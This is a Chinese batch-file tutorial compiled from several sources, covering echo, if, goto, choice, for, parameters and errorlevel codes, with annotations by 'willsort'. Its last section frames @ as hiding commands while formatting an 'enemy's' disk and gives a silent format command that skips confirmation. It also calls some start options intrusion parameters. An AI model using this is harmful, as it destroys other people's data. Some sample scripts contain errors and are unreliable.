cqmis

编者：这个教程和别不一样的地方在于willsort编注那里的内容，是作者多年来的心得．  
批处理的介绍
扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。
==== willsort 编注 =======================================
.bat是dos下的批处理文件
.cmd是nt内核命令行环境的另一种批处理文件
从更广义的角度来看，unix的shell脚本以及其它操作系统甚至应用程序中由外壳进行解释执行的文本，都具有与批处理文件十分相似的作用，而且同样是由专用解释器以行为单位解释执行，这种文本形式更通用的称谓是脚本语言。所以从某个程度分析，batch, unix shell, awk, basic, perl 等脚本语言都是一样的，只不过应用的范围和解释的平台各有不同而已。甚至有些应用程序仍然沿用批处理这一称呼，而其内容和扩展名与dos的批处理却又完全不同。
===================================
首先批处理文件是一个文本文件，这个文件的每一行都是一条DOS命令（大部分时候就好象我们在DOS提示符下执行的命令行一样），你可以使用DOS下的Edit或者Windows的记事本(notepad)等任何文本文件编辑工具创建和修改批处理文件。
==== willsort 题注 ===================
批处理文件中完全可以使用非dos命令，甚至可以使用不具有可执行特性的普通数据性文件，这缘于windows系统这个新型解释平台的涉入，使得批处理的应用越来越"边缘化"。所以我们讨论的批处理应该限定在dos环境或者命令行环境中，否则很多观念和设定都需要做比较大的变动。
========================
其次，批处理文件是一种简单的程序，可以通过条件语句(if)和流程控制语句(goto)来控制命令运行的流程，在批处理中也可以使用循环语句(for)来循环执行一条命令。当然，批处理文件的编程能力与C语言等编程语句比起来是十分有限的，也是十分不规范的。批处理的程序语句就是一条条的DOS命令（包括内部命令和外部命令），而批处理的能力主要取决于你所使用的命令。
==== willsort 编注 ==================
批处理文件(batch file)也可以称之为批处理程序(batch program)，这一点与编译型语言有所不同，就c语言来说，扩展名为c或者cpp的文件可以称之为c语言文件或者c语言源代码，但只有编译连接后的exe文件才可以称之为c语言程序。因为批处理文件本身既具有文本的可读性，又具有程序的可执行性，这些称谓的界限是比较模糊的。
===========================
第三，每个编写好的批处理文件都相当于一个DOS的外部命令，你可以把它所在的目录放到你的DOS搜索路径(path)中来使得它可以在任意位置运行。一个良好的习惯是在硬盘上建立一个bat或者batch目录（例如C:\BATCH），然后将所有你编写的批处理文件放到该目录中，这样只要在path中设置上c:\batch，你就可以在任意位置运行所有你编写的批处理程序。
==== willsort 编注 =====
纯以dos系统而言，可执行程序大约可以细分为五类，依照执行优先级由高到低排列分别是：DOSKEY宏命令（预先驻留内存），COMMAND.COM中的内部命令（根据内存的环境随时进驻内存），以com为扩展名的可执行程序（由command.com 直接载入内存），以exe位扩展名的可执行程序（由command.com 重定位后载入内存），以bat位扩展名的批处理程序（由command.com 解释分析，根据其内容按优先级顺序调用第2，3，4，5种可执行程序，分析一行，执行一行，文件本身不载入内存）
============
第四，在DOS和Win9x/Me系统下，C:盘根目录下的AUTOEXEC.BAT批处理文件是自动运行批处理文件，每次系统启动时会自动运行该文件，你可以将系统每次启动时都要运行的命令放入该文件中，例如设置搜索路径，调入鼠标驱动和磁盘缓存，设置系统环境变量等。下面是一个运行于Windows 98下的autoexec.bat的示例：
@ECHO OFF
PATH C:\WINDOWS;C:\WINDOWS\COMMAND;C:\UCDOS;C:\DOSTools;<br>
C:\SYSTOOLS;C:\WINTOOLS;C:\BATCH
LH SMARTDRV.EXE /X
LH DOSKEY.COM /INSERT
LH CTMOUSE.EXE
SET TEMP=D:\TEMP
SET TMP=D:\TEMP
==== willsort 编注 =====
AUTOEXEC.BAT为DOS系统的自动运行批处理文件，由COMMAND.COM启动时解释执行；
而在Win9x环境中，不仅增加支持了 DOSSTART.BAT, WINSTART.BAT 等许多其它自动运行的批处理文件，对AUTOEXEC.BAT 也增加了 .DOS .W40 .BAK .OLD .PWS 等许多变体以适应复杂的环境和多变的需求。
==== willsort 编注 =============
以下关于命令的分类，有很多值得推敲的地方。常用命令中的@本不是命令，而dir、copy等也很常用的命令却没有列入, 而特殊命令中所有命令对我来说都是常用命令。建议将批处理所引用的命令分为内部命令、外部命令、第三方程序三类。而内部命令和外部命令中别有一类是专用于或常用于批处理中的命令可称之为"批处理命令"。
以下摘录MS-DOS 6.22 帮助文档中关于"批处理命令"的文字，当然，其中有些概念和定义已经有些落后了。
批处理命令
批处理文件或批处理程序是一个包含若干MS-DOS命令的正文文件，扩展名为.BAT。当在命令提示符下敲入批处理程序的名称时，MS-DOS成组执行此批处理程序中的命令。
任何在命令提示符下可使用的命令都可用在批处理程序中。此外，下面MS-DOS命令是专门在批处理程序中使用的。
==========
常用命令
echo、@、call、pause、rem(小技巧：用::代替rem)是批处理文件最常用的几个命令，我们就从他们开始学起。
==== willsort 编注 ===========
首先, @ 不是一个命令, 而是DOS 批处理的一个特殊标记符, 仅用于屏蔽命令行回显. 下面是DOS命令行或批处理中可能会见到的一些特殊标记符:
CR(0D) 命令行结束符
Escape(1B) ANSI转义字符引导符
Space(20) 常用的参数界定符
Tab(09) ; = 不常用的参数界定符
+ COPY命令文件连接符
* ? 文件通配符
"" 字符串界定符
| 命令管道符
< > >> 文件重定向符
@ 命令行回显屏蔽符
/ 参数开关引导符
: 批处理标签引导符
% 批处理变量引导符
其次, :: 确实可以起到rem 的注释作用, 而且更简洁有效; 但有两点需要注意:
第一, 除了 :: 之外, 任何以 :开头的字符行, 在批处理中都被视作标号, 而直接忽略其后的所有内容, 只是为了与正常的标号相区别, 建议使用 goto 所无法识别的标号, 即在 :后紧跟一个非字母数字的一个特殊符号.
第二, 与rem 不同的是, ::后的字符行在执行时不会回显, 无论是否用echo on打开命令行回显状态, 因为命令解释器不认为他是一个有效的命令行, 就此点来看, rem 在某些场合下将比 :: 更为适用; 另外, rem 可以用于 config.sys 文件中.
=====================
echo 表示显示此命令后的字符
echo off 表示在此语句后所有运行的命令都不显示命令行本身
@与echo off相象，但它是加在每个命令行的最前面，表示运行时不显示这一行的命令行（只能影响当前行）。
call 调用另一个批处理文件（如果不用call而直接调用别的批处理文件，那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令）。
pause 运行此句会暂停批处理的执行并在屏幕上显示Press any key to continue...的提示，等待用户按任意键后继续
rem 表示此命令后的字符为解释行（注释），不执行，只是给自己今后参考用的（相当于程序中的注释）。
==== willsort 编注 =====
此处的描述较为混乱, 不如直接引用个命令的命令行帮助更为条理
-------------------------
ECHO
当程序运行时，显示或隐藏批处理程序中的正文。也可用于允许或禁止命令的回显。
在运行批处理程序时，MS-DOS一般在屏幕上显示（回显）批处理程序中的命令。
使用ECHO命令可关闭此功能。
语法
ECHO [ON|OFF]
若要用echo命令显示一条命令，可用下述语法：
echo [message]
参数
ON|OFF
指定是否允许命令的回显。若要显示当前的ECHO的设置，可使用不带参数的ECHO
命令。
message
指定让MS-DOS在屏幕上显示的正文。
-------------------
CALL
从一个批处理程序中调用另一个批处理程序，而不会引起第一个批处理的中止。
语法
CALL [drive:][path]filename [batch-parameters]
参数
[drive:][path]filename
指定要调用的批处理程序的名字及其存放处。文件名必须用.BAT作扩展名。

batch-parameters
指定批处理程序所需的命令行信息。
-------------------------------
PAUSE
暂停批处理程序的执行并显示一条消息，提示用户按任意键继续执行。只能在批处
理程序中使用该命令。
语法
PAUSE

REM
在批处理文件或CONFIG.SYS中加入注解。也可用REM命令来屏蔽命令（在CONFIG.SYS
中也可以用分号(;)代替REM命令，但在批处理文件中则不能替代）。
语法
REM [string]
参数
string
指定要屏蔽的命令或要包含的注解。
=======================
例1：用edit编辑a.bat文件，输入下列内容后存盘为c:\a.bat，执行该批处理文件后可实现：将根目录中所有文件写入 a.txt中，启动UCDOS，进入WPS等功能。
　　批处理文件的内容为: 　　　　　　　 命令注释：
　　　　@echo off　　　　　　　　　　　不显示后续命令行及当前命令行
　　　　dir c:\*.* >a.txt　　　　　　　将c盘文件列表写入a.txt
　　　　call c:\ucdos\ucdos.bat　　　　调用ucdos
　　　　echo 你好 　　　　　　　　　　 显示"你好"
　　　　pause 　　　　　　　　　　　　 暂停,等待按键继续
　　　　rem 准备运行wps 　　　　　　　 注释：准备运行wps
　　　　cd ucdos　　　　　　　　　　　 进入ucdos目录
　　　　wps 　　　　　　　　　　　　　 运行wps　　
批处理文件的参数
批处理文件还可以像C语言的函数一样使用参数（相当于DOS命令的命令行参数），这需要用到一个参数表示符"%"。
%[1-9]表示参数，参数是指在运行批处理文件时在文件名后加的以空格（或者Tab）分隔的字符串。变量可以从%0到%9，%0表示批处理命令本身，其它参数字符串用%1到%9顺序表示。
例2：C:根目录下有一批处理文件名为f.bat，内容为：
@echo off
format %1
如果执行C:\>f a:
那么在执行f.bat时，%1就表示a:，这样format %1就相当于format a:，于是上面的命令运行时实际执行的是format a:
例3：C:根目录下一批处理文件名为t.bat，内容为:
@echo off
type %1
type %2
那么运行C:\>t a.txt b.txt
%1 : 表示a.txt
%2 : 表示b.txt
于是上面的命令将顺序地显示a.txt和b.txt文件的内容。
==== willsort 编注 ===============
参数在批处理中也作为变量处理, 所以同样使用百分号作为引导符, 其后跟0-9中的一个数字构成参数引用符. 引用符和参数之间 (例如上文中的 %1 与 a: ) 的关系类似于变量指针与变量值的关系. 当我们要引用第十一个或更多个参数时, 就必须移动DOS 的参数起始指针. shift 命令正充当了这个移动指针的角色, 它将参数的起始指针移动到下一个参数, 类似C 语言中的指针操作. 图示如下:
初始状态, cmd 为命令名, 可以用 %0 引用
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
^ ^ ^ ^ ^ ^ ^ ^ ^ ^
| | | | | | | | | |
%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
经过1次shift后, cmd 将无法被引用
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
^ ^ ^ ^ ^ ^ ^ ^ ^ ^
| | | | | | | | | |
%0 %1 %2 %3 %4 %5 %6 %7 %8 %9
经过2次shift后, arg1也被废弃, %9指向为空, 没有引用意义
cmd arg1 arg2 arg3 arg4 arg5 arg6 arg7 arg8 arg9 arg10
^ ^ ^ ^ ^ ^ ^ ^ ^
| | | | | | | | |
%0 %1 %2 %3 %4 %5 %6 %7 %8
遗憾的是, win9x 和DOS下均不支持 shift 的逆操作. 只有在 nt 内核命令行环境下, shift 才支持 /n 参数, 可以以第一参数为基准返复移动起始指针.

cqmis

特殊命令

if goto choice for是批处理文件中比较高级的命令，如果这几个你用得很熟练，你就是批处理文件的专家啦。

一、if 是条件语句，用来判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
1、if [not] "参数" == "字符串" 待执行的命令
参数如果等于(not表示不等，下同)指定的字符串，则条件成立，运行命令，否则运行下一句。
例：if "%1"=="a" format a:
==== willsort 编注
if 的命令行帮助中关于此点的描述为:
IF [NOT] string1==string2 command
在此有以下几点需要注意:
1. 包含字符串的双引号不是语法所必须的, 而只是习惯上使用的一种"防空"字符
2. string1 未必是参数, 它也可以是环境变量, 循环变量以及其他字符串常量或变量
3. command 不是语法所必须的, string2 后跟一个空格就可以构成一个有效的命令行
=============================
2、if [not] exist [路径\]文件名 待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。
如: if exist c:\config.sys type c:\config.sys
表示如果存在c:\config.sys文件，则显示它的内容。
****** willsort 编注 ********
也可以使用以下的用法:
if exist command
device 是指DOS系统中已加载的设备, 在win98下通常有:
AUX, PRN, CON, NUL
COM1, COM2, COM3, COM4
LPT1, LPT2, LPT3, LPT4
XMSXXXX0, EMMXXXX0
A: B: C: ...,
CLOCK&#36;, CONFIG&#36;, DblBuff&#36;, IFS&#36;HLP&#36;
具体的内容会因硬软件环境的不同而略有差异, 使用这些设备名称时, 需要保证以下三点:
1. 该设备确实存在(由软件虚拟的设备除外)
2. 该设备驱动程序已加载(aux, prn等标准设备由系统缺省定义)
3. 该设备已准备好(主要是指a: b: ..., com1..., lpt1...等)
可通过命令 mem/d | find "device" /i 来检阅你的系统中所加载的设备
另外, 在DOS系统中, 设备也被认为是一种特殊的文件, 而文件也可以称作字符设备; 因为设备(device)与文件都是使用句柄(handle)来管理的, 句柄就是名字, 类似于文件名, 只不过句柄不是应用于磁盘管理, 而是应用于内存管理而已, 所谓设备加载也即指在内存中为其分配可引用的句柄.
==================================
3、if errorlevel <数字> 待执行的命令
很多DOS程序在运行结束后会返回一个数字值用来表示程序运行的结果(或者状态)，通过if errorlevel命令可以判断程序的返回值，根据不同的返回值来决定执行不同的命令(返回值必须按照从大到小的顺序排列)。如果返回值等于指定的数字，则条件成立，运行命令，否则运行下一句。
如if errorlevel 2 goto x2
==== willsort 编注 ===========
返回值从大到小的顺序排列不是必须的, 而只是执行命令为 goto 时的习惯用法, 当使用 set 作为执行命令时, 通常会从小到大顺序排列, 比如需将返回码置入环境变量, 就需使用以下的顺序形式:
if errorlevel 1 set el=1
if errorlevel 2 set el=2
if errorlevel 3 set el=3
if errorlevel 4 set el=4
if errorlevel 5 set el=5
...
当然, 也可以使用以下循环来替代, 原理是一致的:
for %%e in (1 2 3 4 5 6 7 8...) do if errorlevel %%e set el=%%e
更高效简洁的用法, 可以参考我写的另一篇关于获取 errorlevel 的文章
出现此种现象的原因是, if errorlevel 比较返回码的判断条件并非等于, 而是大于等于. 由于 goto 的跳转特性, 由小到大排序会导致在较小的返回码处就跳出; 而由于 set命令的 "重复" 赋值特性, 由大到小排序会导致较小的返回码 "覆盖" 较大的返回码.
另外, 虽然 if errorlevel=<数字> command 也是有效的命令行, 但也只是 command.com 解释命令行时将 = 作为命令行切分符而忽略掉罢了
===========================

二、goto 批处理文件运行到这里将跳到goto所指定的标号(标号即label，标号用:后跟标准字符串来定义)处，goto语句一般与if配合使用，根据不同的条件来执行不同的命令组。
如:
goto end
:end
echo this is the end
标号用":字符串"来定义，标号所在行不被执行。
==== willsort 编注
label 常被译为 "标签" , 但是这并不具有广泛的约定性.
goto 与 : 联用可实现执行中途的跳转, 再结合 if 可实现执行过程的条件分支, 多个 if 即可实现命令的分组, 类似 C 中 switch case 结构或者 Basic 中的 select case 结构, 大规模且结构化的命令分组即可实现高级语言中的函数功能. 以下是批处理和C/Basic在语法结构上的对照:
Batch C / Basic
goto&: goto&:
goto&:&if if{}&else{} / if&elseif&endif
goto&:&if... switch&case / select case
goto&:&if&set&envar... function() / function(),sub()
==================================
三、choice 使用此命令可以让用户输入一个字符（用于选择），从而根据用户的选择返回不同的errorlevel，然后于if errorlevel配合，根据用户的选择运行不同的命令。
注意：choice命令为DOS或者Windows系统提供的外部命令，不同版本的choice命令语法会稍有不同，请用choice /?查看用法。
choice的命令语法（该语法为Windows 2003中choice命令的语法，其它版本的choice的命令语法与此大同小异）：
CHOICE [/C choices] [/N] [/CS] [/T timeout /D choice] [/M text]
描述:
该工具允许用户从选择列表选择一个项目并返回所选项目的索引。
参数列表:
/C choices 指定要创建的选项列表。默认列表是 "YN"。
/N 在提示符中隐藏选项列表。提示前面的消息得到显示，
选项依旧处于启用状态。
/CS 允许选择分大小写的选项。在默认情况下，这个工具
是不分大小写的。
/T timeout 做出默认选择之前，暂停的秒数。可接受的值是从 0
到 9999。如果指定了 0，就不会有暂停，默认选项
会得到选择。
/D choice 在 nnnn 秒之后指定默认选项。字符必须在用 /C 选
项指定的一组选择中; 同时，必须用 /T 指定 nnnn。
/M text 指定提示之前要显示的消息。如果没有指定，工具只
显示提示。
/? 显示帮助消息。
注意:
ERRORLEVEL 环境变量被设置为从选择集选择的键索引。列出的第一个选
择返回 1，第二个选择返回 2，等等。如果用户按的键不是有效的选择，
该工具会发出警告响声。如果该工具检测到错误状态，它会返回 255 的
ERRORLEVEL 值。如果用户按 Ctrl+Break 或 Ctrl+C 键，该工具会返回 0
的 ERRORLEVEL 值。在一个批程序中使用 ERRORLEVEL 参数时，将参数降
序排列。
示例:
CHOICE /?
CHOICE /C YNC /M "确认请按 Y，否请按 N，或者取消请按 C。"
CHOICE /T 10 /C ync /CS /D y
CHOICE /C ab /M "选项 1 请选择 a，选项 2 请选择 b。"
CHOICE /C ab /N /M "选项 1 请选择 a，选项 2 请选择 b。"
==== willsort 编注 ===============================
我列出win98下choice的用法帮助, 已资区分
Waits for the user to choose one of a set of choices.
等待用户选择一组待选字符中的一个
CHOICE [/C[:]choices] [/N] [/S] [/T[:]c,nn] [text]
/C[:]choices Specifies allowable keys. Default is YN
指定允许的按键(待选字符), 默认为YN
/N Do not display choices and ? at end of prompt string.
不显示提示字符串中的问号和待选字符
/S Treat choice keys as case sensitive.
处理待选字符时大小写敏感
/T[:]c,nn Default choice to c after nn seconds
在 nn 秒后默认选择 c
text Prompt string to display
要显示的提示字符串
ERRORLEVEL is set to offset of key user presses in choices.
ERRORLEVEL 被设置为用户键入的字符在待选字符中的偏移值
====================================
如果我运行命令：CHOICE /C YNC /M "确认请按 Y，否请按 N，或者取消请按 C。"
屏幕上会显示：
确认请按 Y，否请按 N，或者取消请按 C。 [Y,N,C]?

例：test.bat的内容如下（注意，用if errorlevel判断返回值时，要按返回值从高到低排列）:
@echo off
choice /C dme /M "defrag,mem,end"
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
此批处理运行后，将显示"defrag,mem,end[D,M,E]?" ，用户可选择d m e ，然后if语句根据用户的选择作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，批处理运行结束。
四、for 循环命令，只要条件符合，它将多次执行同一命令。
语法：
对一组文件中的每一个文件执行某个特定命令。
FOR %%variable IN (set) DO command [command-parameters]
%%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters
为特定命令指定参数或命令行开关。
例如一个批处理文件中有一行:
for %%c in (*.bat *.txt) do type %%c
则该命令行会显示当前目录下所有以bat和txt为扩展名的文件的内容。
==== willsort 编注 =====================================================
需要指出的是, 当()中的字符串并非单个或多个文件名时, 它将单纯被当作字符串替换, 这个特性再加上()中可以嵌入多个字符串的特性, 很明显 for 可以被看作一种遍历型循环.
当然, 在 nt/2000/xp/2003 系列的命令行环境中, for 被赋予了更多的特性, 使之可以分析命令输出或者文件中的字符串, 也有很多开关被用于扩展了文件替换功能.
========================================================================
批处理示例
1. IF-EXIST
1) 首先用记事本在C:\建立一个test1.bat批处理文件，文件内容如下：
@echo off
IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT
IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist
然后运行它：
C:\>TEST1.BAT
如果C:\存在AUTOEXEC.BAT文件，那么它的内容就会被显示出来，如果不存在，批处理就会提示你该文件不存在。
2) 接着再建立一个test2.bat文件，内容如下：
@ECHO OFF
IF EXIST \%1 TYPE \%1
IF NOT EXIST \%1 ECHO \%1 does not exist
执行:
C:\>TEST2 AUTOEXEC.BAT
该命令运行结果同上。
说明：
(1) IF EXIST 是用来测试文件是否存在的，格式为
IF EXIST [路径+文件名] 命令
(2) test2.bat文件中的%1是参数，DOS允许传递9个批参数信息给批处理文件，分别为%1~%9(%0表示test2命令本身) ，这有点象编程中的实参和形参的关系，%1是形参，AUTOEXEC.BAT是实参。
==== willsort 编注 =====================================================
DOS没有 "允许传递9个批参数信息" 的限制, 参数的个数只会受到命令行长度和所调用命令处理能力的限制. 但是, 我们在批处理程序中, 在同一时刻只能同时引用10个参数, 因为 DOS只给出了 %0~%9这十个参数引用符.
========================================================================
3) 更进一步的，建立一个名为TEST3.BAT的文件，内容如下：
@echo off
IF "%1" == "A" ECHO XIAO
IF "%2" == "B" ECHO TIAN
IF "%3" == "C" ECHO XIN
如果运行：
C:\>TEST3 A B C
屏幕上会显示:
XIAO
TIAN
XIN
如果运行：
C:\>TEST3 A B
屏幕上会显示
XIAO
TIAN
在这个命令执行过程中，DOS会将一个空字符串指定给参数%3。
2、IF-ERRORLEVEL
建立TEST4.BAT，内容如下：
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
IF ERRORLEVEL 1 ECHO 文件拷贝失败
IF ERRORLEVEL 0 ECHO 成功拷贝文件
然后执行文件:
C:\>TEST4
如果文件拷贝成功，屏幕就会显示"成功拷贝文件"，否则就会显示"文件拷贝失败"。
IF ERRORLEVEL 是用来测试它的上一个DOS命令的返回值的，注意只是上一个命令的返回值，而且返回值必须依照从大到小次序顺序判断。
因此下面的批处理文件是错误的：
@ECHO OFF
XCOPY C:\AUTOEXEC.BAT D:\
IF ERRORLEVEL 0 ECHO 成功拷贝文件
IF ERRORLEVEL 1 ECHO 未找到拷贝文件
IF ERRORLEVEL 2 ECHO 用户通过ctrl-c中止拷贝操作
IF ERRORLEVEL 3 ECHO 预置错误阻止文件拷贝操作
IF ERRORLEVEL 4 ECHO 拷贝过程中写盘错误
无论拷贝是否成功，后面的：
未找到拷贝文件
用户通过ctrl-c中止拷贝操作
预置错误阻止文件拷贝操作
拷贝过程中写盘错误
都将显示出来。
以下就是几个常用命令的返回值及其代表的意义：
backup
0 备份成功
1 未找到备份文件
2 文件共享冲突阻止备份完成
3 用户用ctrl-c中止备份
4 由于致命的错误使备份操作中止
diskcomp
0 盘比较相同
1 盘比较不同
2 用户通过ctrl-c中止比较操作
3 由于致命的错误使比较操作中止
4 预置错误中止比较
diskcopy
0 盘拷贝操作成功
1 非致命盘读/写错
2 用户通过ctrl-c结束拷贝操作
3 因致命的处理错误使盘拷贝中止
4 预置错误阻止拷贝操作
format
0 格式化成功
3 用户通过ctrl-c中止格式化处理
4 因致命的处理错误使格式化中止
5 在提示"proceed with format（y/n）?"下用户键入n结束
xcopy
0 成功拷贝文件
1 未找到拷贝文件
2 用户通过ctrl-c中止拷贝操作
4 预置错误阻止文件拷贝操作
5 拷贝过程中写盘错误
==== willsort 编注 =====================================================
chkdsk
0 未找到错误
255 找到一个或多个错误
choice
0 用户按下ctrl+c/break
1 用户按下第一个键
255 检测到命令行中的错误条件
其它 用户按下的有效字符在列表中的位置
defrag
0 碎片压缩成功
1 出现内部错误
2 磁盘上没有空簇。要运行DEFRAG，至少要有一个空簇
3 用户用Ctrl+C退出了DEFRAG
4 出现一般性错误
5 DEFRAG在读簇时遇到错误
6 DEFRAG在写簇时遇到错误
7 分配空间有错
8 内存错
9 没有足够空间来压缩磁盘碎片
deltree
0 成功地删除一个目录
diskcomp
0 两盘相同
1 发现不同
2 按CTRL+C 终止了比较
3 出现严重错误
4 出现初始化错误
find
0 查找成功且至少找到了一个匹配的字符串
1 查找成功但没找到匹配的字符串
2 查找中出现了错误
keyb
0 键盘定义文件装入成功
1 使用了非法的键盘代码，字符集或语法
2 键盘定义文件坏或未找到
4 键盘、监视器通讯时出错
5 要求的字符集未准备好
move
0 成功地移动了指定的文件
1 发生了错误
msav /N
86 检查到了病毒
replace
0 REPLACE成功地替换或加入了文件
1 MS-DOS版本和REPLACE不兼容
2 REPLACE找不到源文件
3 REPLACE找不到源路径或目标路径
5 不能存取要替换的文件
8 内存不够无法执行REPLACE
11 命令行句法错误
restore
0 RESTORE成功地恢复了文件
1 RESTORE找不到要恢复的文件
3 用户按CTRL+C终止恢复过程
4 RESTORE因错误而终止
scandisk
0 ScanDisk在它检查的驱动器上未检测到任何错误
1 由于命令行的语法不对，不能运行ScanDisk
2 由于内存用尽或发生内部错误，ScanDisk意外终止
3 用户让ScanDisk中途退出
4 进行盘面扫描时，用户决定提前退出
254 ScanDisk找到磁盘故障并已全部校正
255 ScanDisk找到磁盘故障，但未能全部校正
setver
0 SETVER成功地完成了任务
1 用户指定了一个无效的命令开关
2 用户指定了一个非法的文件名
3 没有足够的系统内存来运行命令
4 用户指定了一个非法的版本号格式
5 SETVER在版本表中未找到指定的项
6 SETVER未找到SETVER.EXE文件
7 用户指定了一个非法的驱动器
8 用户指定了太多的命令行参数
9 SETVER检测到丢失了命令行参数
10 在读SETVER.EXE文件时，SETVER检测到发生错误
11 SETVER.EXE文件损坏
12 指定的SETVER.EXE文件不支持版本表
13 版本表中没有足够的空间存放新的项
14 在写SETVER.EXE文件时SETVER检测到发生错误
========================================================================
3、IF STRING1 == STRING2
建立TEST5.BAT，文件内容如下：
@echo off
IF "%1" == "A" FORMAT A:
执行：
C:\>TEST5 A
屏幕上就出现是否将A:盘格式化的内容。
注意：为了防止参数为空的情况，一般会将字符串用双引号（或者其它符号，注意不能使用保留符号）括起来。
如：if [%1]==[A] 或者 if %1*==A*
5、GOTO
建立TEST6.BAT，文件内容如下：
@ECHO OFF
IF EXIST C:\AUTOEXEC.BAT GOTO _COPY
GOTO _DONE
:_COPY
COPY C:\AUTOEXEC.BAT D:\
:_DONE
注意：
(1) 标号前是ASCII字符的冒号":"，冒号与标号之间不能有空格。
(2) 标号的命名规则与文件名的命名规则相同。
(3) DOS支持最长八位字符的标号，当无法区别两个标号时，将跳转至最近的一个标号。
==== willsort 编注 =====================================================
1)标号也称作标签(label)
2)标签不能以大多数的非字母数字字符开始, 而文件名中则可以使用很多
3)当无法区别两个标签时, 将跳转至位置最靠前的标签
========================================================================
6、FOR
建立C:\TEST7.BAT，文件内容如下：
@ECHO OFF
FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C
运行：
C:\>TEST7
执行以后，屏幕上会将C:盘根目录下所有以BAT、TXT、SYS为扩展名的文件内容显示出来（不包括隐藏文件）。

cqmis

高手必备：简明批处理教程
    批处理命令如果运用得当，威力强大无人能敌!是不是想学习了呢，从今天我将把批处理的常用命令陆续的介绍给大家，如果大家有什么不懂的地方，可以写下评论:
    批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或
      .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。
      一.简单批处理内部命令简介
      1.Echo 命令
      打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
      语法
      echo [{on　off}] [message]
      Sample：@echo off / echo hello world
      在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
      2.@ 命令
      表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
      Sample：@echo off
      @echo Now initializing the program,please wait a minite...
      @format X: /q/u/autoset (format
      这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。)
      3.Goto 命令
      指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。
      语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
      Sample：
      if {%1}=={} goto noparms
      if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）
      @Rem check parameters if null show usage
      :noparms
      echo Usage: monitor.bat ServerIP PortNumber
      goto end
      标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

      4.Rem 命令
      注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己日后修改。
      Rem Message
      Sample：@Rem Here is the description.
      5.Pause 命令
      运行 Pause 命令时，将显示下面的消息：
      Press any key to continue . . .
      Sample：
      @echo off
      :begin
      copy a:*.* d：\back
      echo Please put a new disk into driver A
      pause
      goto begin
      在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时，pause
      命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。
      6.Call 命令
      从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用
      Call，它将不会在命令行起作用。
      语法
      call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
      参数
      [Drive:}[Path] FileName
      指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。
      7.start 命令
      调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。
      入侵常用参数：
      MIN 开始时窗口最小化
      SEPARATE 在分开的空间内开始 16 位 Windows 程序
      HIGH 在 HIGH 优先级类别开始应用程序
      REALTIME 在 REALTIME 优先级类别开始应用程序
      WAIT 启动应用程序并等候它结束
      parameters 这些为传送到命令/程序的参数
      执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。
      8.choice 命令
      choice
      使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234……
      如: choice /c:dme defrag,mem,end
      将显示
      defrag,mem,end[D,M,E]?
      Sample：
      Sample.bat的内容如下:
      @echo off
      choice /c:dme defrag,mem,end
      if errorlevel 3 goto defrag （应先判断数值最高的错误码）
      if errorlevel 2 goto mem
      if errotlevel 1 goto end
      :defrag
      c:\dos\defrag
      goto end
      :mem
      mem
      goto end
      :end
      echo good bye
      此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e
      ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto
      end将程序跳到end标号处，然后程序将显示good bye，文件结束。
      9.If 命令
      if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
      1、if "参数" == "字符串" 　待执行的命令
      参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）
      如if "%1"=="a" format a:
      if {%1}=={} goto noparms
      if {%2}=={} goto noparms
      2、if exist 文件名　 待执行的命令
      如果有指定的文件，则条件成立，运行命令，否则运行下一句。
      如if exist config.sys edit config.sys
